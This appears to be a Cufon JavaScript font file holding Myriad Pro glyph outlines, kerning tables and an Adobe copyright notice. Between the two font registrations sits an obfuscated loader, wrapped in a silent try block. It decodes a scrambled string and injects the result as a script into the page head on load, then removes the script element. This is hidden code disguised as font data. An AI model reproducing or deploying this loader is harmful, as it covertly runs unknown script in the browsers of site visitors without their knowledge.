"d":"228,36r-108,-32v-58,-2,-107,-45,-107,-123v0,-78,47,-128,113,-128v66,0,109,51,109,123v0,65,-32,99,-69,118v24,6,50,11,71,15xm124,-22v50,0,78,-45,78,-100v0,-49,-26,-99,-77,-99v-53,0,-79,48,-79,101v0,52,28,98,78,98","w":248,"k":{"T":9,"X":10,"Y":10,"A":5,"f":-6,"g":-2,"j":-2,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"t":-6,"u":-1,"v":-5,"w":-5,"y":-5,"z":1,"x":2,"-":-5,")":3,"]":3,"}":3,",":12,".":12}},{"d":"54,-69r-25,0r-5,-174r35,0xm41,4v-12,0,-21,-9,-21,-22v0,-13,9,-23,22,-23v13,0,21,10,21,23v0,13,-9,22,-22,22","w":82},{"w":76,"k":{"T":15,"V":13,"W":13,"Y":17}},{"d":"25,0r1,-256r32,0r0,110v36,-60,134,-30,134,57v0,93,-96,123,-138,61r-2,28r-27,0xm107,-153v-35,-1,-53,36,-49,83v3,31,23,48,49,49v33,0,52,-27,52,-67v0,-35,-18,-65,-52,-65","w":204,"k":{"T":14,"v":3,"w":3,"y":3,"z":3,"x":5,"-":-5,")":1,"]":1,"}":1,"\"":4,"'":4,",":9,".":9}},{"d":"100,0r-33,0r-62,-243r34,0r47,207r52,-207r33,0r30,123v8,28,10,60,17,84r52,-207r32,0r-69,243r-33,0r-30,-126v-9,-30,-11,-58,-17,-80v-12,65,-37,141,-53,206","w":304,"k":{"T":-12,"J":8,"V":-6,"W":-6,"A":21,"a":12,"g":3,"b":2,"h":2,"k":2,"l":2,"i":6,"m":6,"n":6,"p":6,"r":6,"c":12,"d":12,"e":12,"o":12,"q":12,"s":9,"t":-3,"u":6,"v":1,"w":1,"y":1,"z":1,":":6,";":6,"-":5,")":-20,"]":-20,"}":-20,"\"":-7,"'":-7,",":20,".":20}},{"d":"123,14r-24,0r-98,-261r24,0","w":122},{"d":"95,40r-66,0r0,-287r66,0r0,20r-41,0r0,248r41,0r0,19","w":102,"k":{"T":-17,"J":-6,"C":4,"G":4,"O":4,"Q":4,"V":-18,"W":-18,"X":-4,"Y":-15,"A":4,"j":-20}},{"d":"100,-178v50,0,84,36,84,89v0,64,-45,93,-87,93v-47,0,-83,-35,-83,-90v0,-58,38,-92,86,-92xm99,-154v-37,0,-53,34,-53,67v0,38,22,67,53,67v30,0,53,-28,53,-67v0,-30,-16,-67,-53,-67","w":197,"k":{"T":14,"v":3,"w":3,"y":3,"z":3,"x":5,"-":-5,")":1,"]":1,"}":1,"\"":4,"'":4,",":9,".":9}},{"d":"96,-192r23,0r0,85r81,0r0,22r-81,0r0,85r-23,0r0,-85r-82,0r0,-22r82,0r0,-85","w":214},{"d":"11,-109r89,0r0,23r-89,0r0,-23","w":110,"k":{"T":18,"J":7,"C":-5,"G":-5,"O":-5,"Q":-5,"V":4,"W":4,"X":8,"Y":18,"A":1,"g":-5,"c":-6,"d":-6,"e":-6,"o":-6,"q":-6,"v":2,"w":2,"y":2}},{"d":"217,0r-38,0r-22,-23v-44,49,-146,26,-146,-41v0,-34,22,-55,48,-72v-36,-40,-23,-109,41,-111v30,0,54,20,54,52v0,28,-20,43,-54,66r59,67v11,-17,19,-40,24,-71r29,0v-6,38,-17,69,-35,90xm41,-69v0,53,74,63,100,27r-68,-76v-13,9,-32,23,-32,49xm98,-225v-42,2,-35,59,-12,79v24,-14,40,-27,40,-48v0,-15,-8,-31,-28,-31","w":217},{"d":"145,-30r5,24v-8,4,-27,10,-50,10v-53,0,-86,-36,-86,-89v0,-70,73,-113,137,-83r-7,24v-42,-24,-106,5,-98,57v-4,57,55,78,99,57","w":161,"k":{"T":4,"f":-1,"c":2,"d":2,"e":2,"o":2,"q":2,"t":-5,"v":-6,"w":-6,"y":-6,"-":-2,",":4,".":4}},{"d":"26,71r-1,-245r28,0r2,30v37,-62,137,-33,137,54v0,91,-90,121,-134,67r0,94r-32,0xm108,-153v-36,0,-50,35,-50,82v0,32,23,50,49,50v33,0,52,-27,52,-67v0,-35,-18,-65,-51,-65","w":204,"k":{"T":14,"v":3,"w":3,"y":3,"z":3,"x":5,"-":-5,")":1,"]":1,"}":1,"\"":4,"'":4,",":9,".":9}},{"d":"96,-22v64,0,40,-91,44,-152r32,0r2,174r-29,0v-1,-9,1,-21,-2,-28v-8,14,-27,32,-58,32v-27,0,-60,-15,-60,-76r0,-102r32,0v4,57,-19,152,39,152","w":198,"k":{"T":11,",":3,".":3}},{"d":"68,-238v32,0,53,26,53,70v0,49,-25,73,-55,73v-30,0,-55,-23,-55,-70v0,-47,25,-73,57,-73xm66,-219v-19,0,-30,24,-30,53v0,30,10,52,30,52v21,0,30,-22,30,-53v0,-29,-8,-52,-30,-52xm83,4r-20,0r138,-242r20,0xm220,-141v32,0,54,25,54,70v0,49,-26,74,-56,74v-30,0,-55,-24,-55,-71v0,-47,25,-73,57,-73xm219,-122v-19,0,-31,23,-31,53v0,30,11,52,31,52v21,0,30,-22,30,-53v0,-28,-8,-52,-30,-52","w":285},{"d":"166,0r-150,0v-4,-27,13,-32,25,-44v58,-58,87,-87,87,-122v0,-24,-11,-46,-46,-46v-21,0,-39,11,-50,20r-10,-22v16,-13,39,-24,66,-24v50,0,72,35,72,68v0,47,-56,99,-99,144r105,0r0,26"},{"d":"238,0r-11,-211v-9,28,-18,59,-30,92r-43,118r-24,0r-40,-116v-13,-34,-18,-67,-28,-94r-11,211r-30,0r17,-243r40,0r66,199v17,-63,47,-137,69,-199r40,0r16,243r-31,0","w":289,"k":{"T":4,"A":4,"a":-2,"j":-4,"i":-4,"m":-4,"n":-4,"p":-4,"r":-4,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"u":-1,"v":-3,"w":-3,"y":-3,"-":-2}},{"d":"144,0r-30,0r0,-64r-109,0r0,-21r105,-149r34,0r0,145r33,0r0,25r-33,0r0,64xm114,-89r0,-114v-22,44,-50,75,-77,114r77,0"},{"d":"21,-234r147,0r0,21r-102,213r-33,0r102,-208r-114,0r0,-26"},{"d":"27,-243r32,0r0,144v0,54,24,77,56,77v36,0,59,-24,59,-77r0,-144r32,0r0,142v0,75,-39,105,-92,105v-50,0,-87,-28,-87,-104r0,-143","w":232,"k":{"A":12,"a":1,"f":-3,"s":2,"t":-1,"v":1,"w":1,"y":1,"z":2,"x":3,",":10,".":10}},{"d":"5,-174r34,0r49,142r48,-142r34,0r-69,174r-30,0","w":173,"k":{"T":11,"a":1,"g":4,"c":4,"d":4,"e":4,"o":4,"q":4,"s":2,"v":-4,"w":-4,"y":-4,":":-9,";":-9,"-":1,",":14,".":14}},{"d":"82,-178v95,3,58,96,69,178r-28,0v-2,-7,0,-17,-4,-22v-10,14,-28,26,-53,26v-35,0,-53,-25,-53,-50v0,-42,37,-65,104,-65v0,-18,-2,-41,-39,-43v-17,0,-34,5,-46,13r-7,-22v14,-9,35,-15,57,-15xm74,-19v38,-2,48,-28,44,-70v-35,-1,-74,5,-74,39v0,21,14,31,30,31","w":173},{"d":"33,-9v-1,-33,28,-83,-23,-86r0,-18v51,-3,22,-53,23,-87v1,-35,25,-49,60,-47r0,20v-74,-7,6,111,-56,123v61,7,-19,127,56,125r0,19v-35,1,-59,-10,-60,-49","w":102,"k":{"T":-17,"J":-6,"C":4,"G":4,"O":4,"Q":4,"V":-18,"W":-18,"X":-4,"Y":-15,"A":4,"j":-20}},{"d":"150,-238r0,26v-62,-1,-101,39,-105,85v34,-49,128,-27,128,48v0,43,-29,83,-78,83v-50,0,-83,-39,-83,-100v0,-89,51,-139,138,-142xm141,-77v0,-66,-97,-70,-97,-11v0,39,18,67,51,67v27,0,46,-23,46,-56"},{"d":"27,0r0,-243r131,0r0,27r-99,0r0,80r91,0r0,26r-91,0r0,110r-32,0","w":175,"k":{"J":31,"M":6,"A":28,"a":16,"g":6,"b":6,"h":6,"k":6,"l":6,"i":9,"m":9,"n":9,"p":9,"r":9,"c":11,"d":11,"e":11,"o":11,"q":11,"u":13,"v":8,"w":8,"y":8,":":5,";":5,",":35,".":35}},{"d":"108,0v-40,13,-75,-6,-75,-55r0,-95r-27,0r0,-24r27,0r0,-33r31,-9r0,42r46,0r0,24r-46,0r0,94v-3,31,19,38,43,32","w":119,"k":{"g":2,"c":2,"d":2,"e":2,"o":2,"q":2,"v":-3,"w":-3,"y":-3,"-":2,",":1,".":1}},{"d":"13,53v25,-9,45,-29,57,-58r-67,-169r35,0r50,138r46,-138r33,0v-41,86,-59,232,-146,253","w":169,"k":{"T":11,"a":1,"g":4,"c":4,"d":4,"e":4,"o":4,"q":4,"s":2,"v":-4,"w":-4,"y":-4,":":-9,";":-9,"-":1,",":14,".":14}},{"d":"153,-76r-86,0r-26,76r-32,0r83,-243r37,0r83,243r-33,0xm73,-101r74,0r-25,-70v-6,-15,-6,-32,-13,-44v-9,39,-24,77,-36,114","w":220,"k":{"T":28,"J":-7,"M":1,"C":5,"G":5,"O":5,"Q":5,"U":10,"V":19,"W":19,"X":5,"Y":28,"a":-1,"f":3,"g":4,"b":1,"h":1,"k":1,"l":1,"j":1,"i":1,"m":1,"n":1,"p":1,"r":1,"c":4,"d":4,"e":4,"o":4,"q":4,"s":2,"t":4,"u":4,"v":8,"w":8,"y":8,"z":-5,"-":1,")":3,"]":3,"}":3,"\"":21,"'":21}},{"d":"85,0r-1,-204r-40,21r-7,-24v25,-10,40,-31,79,-27r0,234r-31,0"},{"d":"28,42r-22,3v8,-22,17,-61,21,-87r36,-3v-9,31,-25,70,-35,87","w":74,"k":{"\"":37,"'":37}},{"d":"77,-83r0,-160r31,0r0,163v1,79,-50,94,-107,78r5,-25v39,10,71,5,71,-56","w":133,"k":{"v":-4,"w":-4,"y":-4,")":-15,"]":-15,"}":-15,",":4,".":4}},{"d":"197,0r-37,0r-60,-102r-55,102r-36,0r74,-123r-71,-120r36,0r56,98r54,-98r37,0r-74,118","w":205,"k":{"T":-3,"J":-1,"C":10,"G":10,"O":10,"Q":10,"V":-3,"W":-3,"X":5,"Y":-2,"A":3,"a":2,"c":4,"d":4,"e":4,"o":4,"q":4,"u":3,"v":7,"w":7,"y":7,"-":8}},{"d":"-17,51v42,-8,47,-15,47,-79r0,-146r32,0v-8,98,36,248,-75,250xm46,-243v12,0,20,9,20,20v0,10,-8,19,-21,19v-12,0,-19,-9,-19,-19v0,-11,8,-20,20,-20","w":87,"k":{",":4,".":4}},{"d":"175,-26v0,95,-78,120,-146,87r8,-25v44,31,124,12,106,-66v-9,16,-28,29,-55,29v-43,0,-74,-37,-74,-85v0,-90,99,-117,134,-62r1,-26r28,0v-4,41,-2,102,-2,148xm97,-25v37,1,51,-35,47,-80v-3,-29,-18,-47,-46,-48v-30,0,-52,26,-52,66v0,34,17,62,51,62","w":201,"k":{"T":12,"f":-1,"i":2,"m":2,"n":2,"p":2,"r":2,",":5,".":5}},{"d":"177,-174v0,61,-55,87,-118,77r0,97r-32,0r0,-240v64,-11,150,-6,150,66xm59,-217r0,94v42,11,86,-7,86,-49v0,-43,-48,-54,-86,-45","w":191,"k":{"J":27,"M":4,"X":5,"Y":3,"A":30,"Z":11,"a":9,"g":9,"b":2,"h":2,"k":2,"l":2,"i":6,"m":6,"n":6,"p":6,"r":6,"c":9,"d":9,"e":9,"o":9,"q":9,"s":8,"t":-2,"u":5,"v":-1,"w":-1,"y":-1,":":4,";":4,"-":6,",":50,".":50}},{"d":"35,4r0,-26v59,3,99,-34,104,-86v-36,49,-124,20,-124,-47v0,-44,32,-83,80,-83v95,0,90,167,37,208v-27,21,-56,34,-97,34xm46,-157v0,60,94,67,94,14v0,-40,-15,-71,-48,-71v-27,0,-46,24,-46,57"},{"d":"227,-127v0,107,-90,142,-200,126r0,-238v103,-18,200,8,200,112xm59,-216r0,192v81,9,135,-25,135,-102v0,-69,-60,-107,-135,-90","w":239,"k":{"T":9,"X":10,"Y":10,"A":5,"f":-6,"g":-2,"j":-2,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"t":-6,"u":-1,"v":-5,"w":-5,"y":-5,"z":1,"x":2,"-":-5,")":3,"]":3,"}":3,",":12,".":12}},{"d":"101,31r-23,0r0,-36v-21,0,-41,-7,-54,-16r8,-24v25,20,97,24,95,-20v0,-20,-14,-32,-41,-43v-37,-14,-59,-32,-59,-63v0,-30,21,-53,54,-58r0,-36r22,0r0,35v21,1,36,7,47,13r-9,24v-8,-4,-22,-13,-45,-13v-28,0,-38,16,-38,31v0,18,12,31,44,41v72,23,76,113,-1,127r0,38"},{"d":"24,14r-24,0r100,-261r25,0","w":123},{"d":"58,0r-32,0r0,-174r32,0r0,174xm42,-243v12,0,20,9,20,20v0,11,-8,19,-21,19v-12,0,-19,-8,-19,-19v0,-11,8,-20,20,-20","w":84},{"d":"117,-43v36,0,47,-52,52,-89v-40,-13,-76,21,-75,62v0,16,7,27,23,27xm183,8r6,15v-78,40,-174,-3,-174,-98v0,-74,52,-138,132,-138v63,0,104,44,104,104v0,54,-30,86,-63,86v-17,0,-25,-15,-29,-32v-20,43,-87,45,-89,-14v-2,-58,63,-103,124,-78r-13,66v-5,27,-1,40,11,40v18,1,39,-25,39,-66v0,-53,-31,-90,-87,-90v-59,0,-108,47,-108,120v0,82,81,120,147,85","w":265},{"d":"58,-147v56,-6,99,17,103,71v5,69,-93,99,-146,66r8,-25v31,22,110,16,106,-37v7,-41,-52,-59,-100,-50r15,-112r112,0r0,27r-89,0"},{"d":"40,4v-12,0,-21,-10,-21,-23v0,-13,8,-22,21,-22v13,0,22,9,22,22v0,13,-9,23,-22,23","w":74,"k":{"\"":37,"'":37}},{"d":"15,-12r9,-24v9,5,30,14,52,14v40,0,53,-25,53,-45v-1,-39,-38,-50,-79,-47r0,-24v35,2,66,-5,70,-39v5,-40,-68,-42,-88,-20r-8,-23v13,-9,36,-18,61,-18v82,0,87,90,24,111v27,8,52,26,52,61v0,37,-29,70,-85,70v-26,0,-49,-8,-61,-16"},{"d":"40,-123v-12,0,-21,-9,-21,-22v0,-13,9,-23,21,-23v13,0,22,10,22,23v0,13,-9,22,-22,22xm40,4v-12,0,-21,-9,-21,-22v0,-13,9,-23,21,-23v13,0,22,10,22,23v0,13,-9,22,-22,22","w":74},{"d":"6,-174r33,0r37,144v11,-49,29,-97,44,-144r27,0r43,144v8,-48,26,-98,38,-144r32,0r-57,174r-28,0r-43,-140v-11,50,-29,93,-44,140r-29,0","w":264,"k":{"T":11,"a":1,"g":4,"c":4,"d":4,"e":4,"o":4,"q":4,"s":2,"v":-4,"w":-4,"y":-4,":":-9,";":-9,"-":1,",":14,".":14}},{"d":"69,-200v1,35,-28,84,23,87r0,18v-50,3,-22,52,-23,86v-1,39,-25,51,-60,49r0,-19v72,8,-3,-112,56,-125v-60,-7,19,-126,-56,-123r0,-20v35,-1,59,12,60,47","w":102},{"d":"70,-250r25,0v-26,36,-45,82,-45,148v0,64,20,110,45,146r-25,0v-23,-30,-47,-77,-47,-147v0,-71,24,-117,47,-147","w":102,"k":{"T":-17,"J":-6,"C":4,"G":4,"O":4,"Q":4,"V":-18,"W":-18,"X":-4,"Y":-15,"A":4,"j":-20}},{"d":"8,-249r34,0r32,51r-22,0","w":108},{"d":"57,0r-30,0r0,-243r35,0r77,123v19,28,32,56,45,79v-6,-60,-3,-135,-4,-202r30,0r0,243r-32,0r-77,-123v-18,-27,-32,-57,-46,-81","w":236,"k":{"Y":3,"f":-4,"b":-4,"h":-4,"k":-4,"l":-4,"j":-3,"i":-4,"m":-4,"n":-4,"p":-4,"r":-4,"t":-6,"v":-3,"w":-3,"y":-3,"z":-4,"x":-2}},{"d":"18,-249r32,0r-6,86r-20,0xm72,-249r31,0r-6,86r-19,0","w":121,"k":{"T":-6,"J":21,"M":2,"C":1,"G":1,"O":1,"Q":1,"V":-6,"W":-6,"Y":-1,"A":22,"f":-9,"g":4,"c":3,"d":3,"e":3,"o":3,"q":3,"t":-9,"v":-8,"w":-8,"y":-8,",":41,".":41}},{"d":"153,-140r0,26r-94,0r0,88r105,0r0,26r-137,0r0,-243r131,0r0,27r-99,0r0,76r94,0","w":177,"k":{"T":-6,"J":-6,"V":-3,"W":-3,"Y":-1,"g":2,"c":1,"d":1,"e":1,"o":1,"q":1,"t":1,"u":3,"v":3,"w":3,"y":3,"z":-1,",":1,".":1}},{"d":"11,0r0,-18r134,-198r-123,0r0,-27r164,0r0,19r-134,198r136,0r0,26r-177,0","w":199,"k":{"J":-3,"C":8,"G":8,"O":8,"Q":8,"X":2,"c":4,"d":4,"e":4,"o":4,"q":4,"u":3,"v":3,"w":3,"y":3,"-":10}},{"d":"99,-152v-59,0,-39,92,-42,152r-31,0r-1,-174r28,0v1,9,-1,21,2,28v15,-39,91,-43,105,3v28,-50,114,-57,115,41r0,102r-31,0v-4,-55,18,-152,-37,-152v-59,0,-37,93,-41,152r-31,0v-5,-56,20,-152,-36,-152","w":300,"k":{"T":18,"t":1,"v":5,"w":5,"y":5,"\"":3,"'":3}},{"d":"197,-129v-1,98,-90,33,-137,23v-13,0,-21,8,-21,30r-21,0v-1,-36,17,-54,42,-54v24,0,72,32,96,31v13,0,20,-10,20,-30r21,0","w":214},{"d":"145,71r-1,-98v-34,58,-130,28,-130,-57v0,-96,94,-119,133,-64r1,-26r30,0r-2,245r-31,0xm97,-21v37,0,48,-36,48,-83v0,-30,-19,-49,-47,-49v-33,0,-52,28,-52,67v0,35,16,65,51,65","w":202,"k":{"T":11,",":3,".":3}},{"d":"60,-122v-66,-28,-39,-118,35,-116v77,2,93,84,29,112v27,14,47,33,47,62v0,41,-34,68,-79,68v-91,0,-104,-102,-32,-126xm93,-19v28,0,46,-18,46,-42v0,-28,-19,-42,-51,-51v-55,12,-58,91,5,93xm93,-215v-26,0,-41,17,-41,37v0,23,18,36,45,43v42,-9,52,-78,-4,-80"},{"d":"32,44r-25,0v57,-62,59,-232,0,-294r25,0v23,30,47,76,47,147v0,71,-24,117,-47,147","w":102},{"d":"58,-256r0,162v20,-28,45,-53,67,-80r38,0r-67,71r76,103r-38,0r-60,-84r-16,18r0,66r-32,0r0,-256r32,0","w":168,"k":{"T":7,"a":-6,"b":-6,"h":-6,"k":-6,"l":-6,"i":-6,"m":-6,"n":-6,"p":-6,"r":-6,"u":-1,"v":-5,"w":-5,"y":-5,":":-4,";":-4,"-":4,",":-5,".":-5}},{"d":"27,0r0,-243r32,0r0,217r103,0r0,26r-135,0","w":169,"k":{"T":32,"J":-4,"C":14,"G":14,"O":14,"Q":14,"U":13,"V":21,"W":21,"Y":30,"c":5,"d":5,"e":5,"o":5,"q":5,"t":1,"u":5,"v":10,"w":10,"y":10,"-":15,"\"":35,"'":35}},{"d":"31,-270r24,0r0,360r-24,0r0,-360","w":86},{"d":"27,-243r32,0r0,243r-32,0r0,-243","w":86,"k":{"Y":3,"f":-4,"b":-4,"h":-4,"k":-4,"l":-4,"j":-3,"i":-4,"m":-4,"n":-4,"p":-4,"r":-4,"t":-6,"v":-3,"w":-3,"y":-3,"z":-4,"x":-2}},{"d":"166,-81r-122,0v-2,64,66,69,108,51r6,23v-11,5,-31,11,-59,11v-54,0,-85,-35,-85,-88v0,-53,30,-94,81,-94v63,0,75,53,71,97xm44,-104r93,0v0,-20,-8,-51,-44,-51v-32,0,-46,29,-49,51","w":180,"k":{"T":12,"x":1,"-":-10,",":4,".":4}},{"d":"180,-69v0,70,-85,76,-153,68r0,-238v57,-10,144,-11,144,55v0,25,-18,43,-41,54v23,5,50,25,50,61xm59,-218r0,78v42,4,80,-8,80,-41v0,-38,-46,-43,-80,-37xm59,-116r0,92v40,6,89,-1,88,-45v0,-42,-42,-50,-88,-47","w":195,"k":{"T":3,"V":-1,"W":-1,"Y":5,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":-1,"w":-1,"y":-1,"-":-2,",":5,".":5}},{"d":"200,-121r-186,0r0,-22r186,0r0,22xm200,-51r-186,0r0,-21r186,0r0,21","w":214},{"d":"115,0r-34,0r-80,-243r34,0r65,211v17,-69,46,-144,68,-211r34,0","w":200,"k":{"T":-12,"J":8,"V":-6,"W":-6,"A":21,"a":12,"g":3,"b":2,"h":2,"k":2,"l":2,"i":6,"m":6,"n":6,"p":6,"r":6,"c":12,"d":12,"e":12,"o":12,"q":12,"s":9,"t":-3,"u":6,"v":1,"w":1,"y":1,"z":1,":":6,";":6,"-":5,")":-20,"]":-20,"}":-20,"\"":-7,"'":-7,",":20,".":20}},{"d":"190,-33r7,25v-11,6,-35,12,-65,12v-68,0,-119,-43,-119,-123v0,-97,99,-152,184,-117r-8,26v-67,-29,-143,7,-143,90v0,81,75,116,144,87","w":208,"k":{"T":-10,"J":-1,"C":8,"G":8,"O":8,"Q":8,"V":-4,"W":-4,"Y":-1,"A":-1,"a":3,"i":1,"m":1,"n":1,"p":1,"r":1,"c":4,"d":4,"e":4,"o":4,"q":4,"u":4,"v":7,"w":7,"y":7,"z":-1,")":-6,"]":-6,"}":-6}},{"d":"27,-243r32,0r0,102r117,0r0,-102r32,0r0,243r-32,0r0,-114r-117,0r0,114r-32,0r0,-243","w":234,"k":{"Y":3,"f":-4,"b":-4,"h":-4,"k":-4,"l":-4,"j":-3,"i":-4,"m":-4,"n":-4,"p":-4,"r":-4,"t":-6,"v":-3,"w":-3,"y":-3,"z":-4,"x":-2}},{"d":"27,-239v64,-11,150,-9,150,61v0,33,-23,51,-46,62v37,3,43,98,54,116r-32,0v-4,-7,-10,-28,-16,-58v-8,-44,-32,-49,-78,-47r0,105r-32,0r0,-239xm59,-217r0,88v46,4,86,-6,86,-46v0,-43,-50,-50,-86,-42","w":193,"k":{"T":-3,"C":-1,"G":-1,"O":-1,"Q":-1,"V":-6,"W":-6,"X":-2,"Y":4,"A":-2,"a":-4,"b":-3,"h":-3,"k":-3,"l":-3,"i":-4,"m":-4,"n":-4,"p":-4,"r":-4,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"t":-7,"v":-5,"w":-5,"y":-5}},{"d":"138,3v-73,1,-125,-46,-125,-123v0,-94,102,-150,192,-114r-8,26v-66,-30,-151,5,-151,87v0,78,68,114,135,91r0,-72r-49,0r0,-25r80,0r0,116v-14,5,-41,14,-74,14","w":232,"k":{"a":-3,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2}},{"d":"113,0r-32,0r0,-103r-77,-140r36,0r59,117v17,-38,41,-79,60,-117r35,0r-81,140r0,103","w":194,"k":{"T":-12,"J":19,"M":4,"C":13,"G":13,"O":13,"Q":13,"V":-10,"W":-10,"X":1,"Y":-1,"A":29,"S":5,"B":3,"D":3,"E":3,"F":3,"H":3,"I":3,"K":3,"L":3,"N":3,"P":3,"R":3,"a":25,"g":14,"b":3,"h":3,"k":3,"l":3,"i":5,"m":5,"n":5,"p":5,"r":5,"c":27,"d":27,"e":27,"o":27,"q":27,"s":19,"t":7,"u":19,"v":10,"w":10,"y":10,"z":9,"x":9,":":12,";":12,"-":18,")":-20,"]":-20,"}":-20,"\"":-3,"'":-3,",":34,".":34}},{"d":"95,-238v49,0,77,43,77,118v0,80,-30,124,-81,124v-46,0,-78,-43,-78,-120v0,-79,34,-122,82,-122xm93,-213v-27,0,-48,33,-48,97v0,61,19,95,48,95v32,0,47,-37,47,-97v0,-58,-14,-95,-47,-95"},{"d":"28,42r-22,2v8,-22,18,-59,22,-86r35,-4v-9,31,-25,71,-35,88xm42,-123v-12,0,-20,-9,-20,-22v0,-13,9,-23,21,-23v13,0,21,10,21,23v0,13,-9,22,-22,22","w":74},{"d":"27,0r0,-243r32,0r1,117v29,-41,62,-78,93,-117r39,0r-88,103r95,140r-37,0r-80,-119r-23,26r0,93r-32,0","w":195,"k":{"T":-8,"J":-14,"C":6,"G":6,"O":6,"Q":6,"V":-5,"W":-5,"Y":3,"A":-4,"Z":-7,"a":-6,"g":2,"b":-4,"h":-4,"k":-4,"l":-4,"i":-4,"m":-4,"n":-4,"p":-4,"r":-4,"u":2,"v":6,"w":6,"y":6,":":-8,";":-8,"-":6,")":-8,"]":-8,"}":-8,",":-6,".":-6}},{"d":"79,-69r-28,0v-17,-43,45,-87,47,-121v2,-34,-50,-39,-71,-20r-9,-23v36,-29,121,-9,112,39v3,44,-64,75,-51,125xm64,4v-12,0,-21,-9,-21,-22v0,-13,9,-23,21,-23v13,0,22,10,22,23v0,13,-9,22,-22,22","w":146},{"d":"145,-256r31,0r2,256r-28,0v-2,-9,0,-22,-3,-30v-32,62,-133,31,-133,-55v0,-86,90,-120,131,-67r0,-104xm97,-22v35,1,48,-34,48,-81v0,-31,-19,-50,-47,-50v-33,0,-52,29,-52,67v0,35,17,64,51,64","w":203,"k":{",":4,".":4}},{"d":"97,-247r21,13r-34,45r55,-7r0,25v-18,-1,-39,-7,-55,-6r35,43r-23,13v-8,-16,-13,-35,-23,-50r-23,50r-20,-13v11,-16,25,-28,34,-45r-53,8r0,-25v17,1,38,7,53,6r-34,-44r22,-13v8,16,13,36,23,51","w":149},{"d":"125,-247v67,0,110,51,110,123v0,83,-51,128,-113,128v-64,0,-109,-51,-109,-124v0,-77,47,-127,112,-127xm124,-221v-52,0,-78,48,-78,101v0,52,28,98,78,98v50,0,78,-45,78,-100v0,-49,-26,-99,-78,-99","w":248,"k":{"T":9,"X":10,"Y":10,"A":5,"f":-6,"g":-2,"j":-2,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"t":-6,"u":-1,"v":-5,"w":-5,"y":-5,"z":1,"x":2,"-":-5,")":3,"]":3,"}":3,",":12,".":12}},{"d":"14,-8r8,-24v18,15,76,19,76,-14v0,-15,-8,-24,-32,-31v-69,-20,-59,-99,13,-101v18,0,34,5,43,11r-8,23v-13,-12,-64,-17,-64,13v0,14,8,23,32,30v67,18,58,108,-19,105v-19,0,-37,-5,-49,-12","w":142,"k":{"T":9,",":4,".":4}},{"d":"15,-12r8,-26v29,24,107,22,107,-26v0,-22,-12,-40,-46,-48v-88,-22,-82,-136,15,-135v24,0,43,6,53,12r-9,26v-8,-5,-23,-12,-45,-12v-33,0,-46,20,-46,37v0,23,14,36,48,46v88,26,83,142,-23,142v-23,0,-49,-7,-62,-16","w":177,"k":{"a":-1,"j":1,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"t":1,"v":3,"w":3,"y":3,"-":-2}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+154-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("zIPm>_=)WvL7z5H+%_D.MIML:`=mP_L7:`;.WvCjPibo|A)xw_Pgi9-,>I{^w5%w:i*m$9nN$SMq}4VQ|H%k:Dp1z.)_|Jnm;Tn59VDISM;zf$=eEsC4Y}iv:|PW>k%wgQNxqGH_j^?@Rop71-*.A)m`Jc{~+bL,]Y;==9%i%_D+=GP)w}V*fV?|W_%se}sG:5L?s9}7$A?Jg4NQYH-xCi?pgjVczvp$gVHHsqmvs)N4CmG-e)o]P5?Ekm$xfj=->IH)z5Mxz4*?EYTok9mxfjTo>9m-f_*H>_%)W5*jEvM7Px{j>SH-WS$LwJ)+Wv|^|x{1WA)1:xQ]ej%J%m-7zYb^EA?o>`=N>IN1kJCb|_io>IDx>`Lx|v;H:5{q>`)?;5L?fjCHkJs^>ILq|:C?>`c7WILA%I{N>v}?zvP1kxQ+WY*oe.oRW4Hjv`=>Wim%E:n>WimLz4Q?")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":184,"face":{"font-family":"myriadpro","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 3 3 4 3 2 2 4","ascent":"270","descent":"-90","x-height":"4","bbox":"-17 -270 302 90","underline-thickness":"18","underline-position":"-18","stemh":"24","stemv":"32","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 1992, 1994, 1997, 2000, 2004 Adobe Systems Incorporated. All rights reserved.
 * Protected by U.S. Patents D454,582.
 * 
 * Trademark:
 * Myriad is either a registered trademark or a trademark of Adobe Systems
 * Incorporated in the United States and/or other countries.
 * 
 * Full name:
 * MyriadPro-Bold
 * 
 * Designer:
 * Robert Slimbach and Carol Twombly
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 * 
 * License information:
 * http://www.adobe.com/type/legal.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"194,-50r8,44v-10,5,-33,10,-62,10v-84,0,-127,-53,-127,-122v0,-106,104,-150,192,-117r-12,43v-54,-23,-123,-3,-123,71v0,67,65,94,124,71","w":214,"k":{"T":-5,"J":-4,"C":11,"G":11,"O":11,"Q":11,"V":-3,"W":-3,"X":-1,"Y":-3,"A":-4,"b":1,"h":1,"k":1,"l":1,"i":1,"m":1,"n":1,"p":1,"r":1,"c":7,"d":7,"e":7,"o":7,"q":7,"u":7,"v":12,"w":12,"y":12,"a":4,"z":-3,")":-3,"]":-3,"}":-3,"\"":-2,"'":-2}},{"d":"238,-127v5,116,-104,141,-214,126r0,-238v20,-3,47,-5,74,-5v91,0,136,34,140,117xm78,-200r0,159v62,7,102,-19,102,-84v0,-59,-44,-85,-102,-75","w":250,"k":{"T":10,"V":3,"W":3,"X":12,"Y":13,"A":6,"f":-4,"g":-1,"b":-1,"h":-1,"k":-1,"l":-1,"i":-1,"m":-1,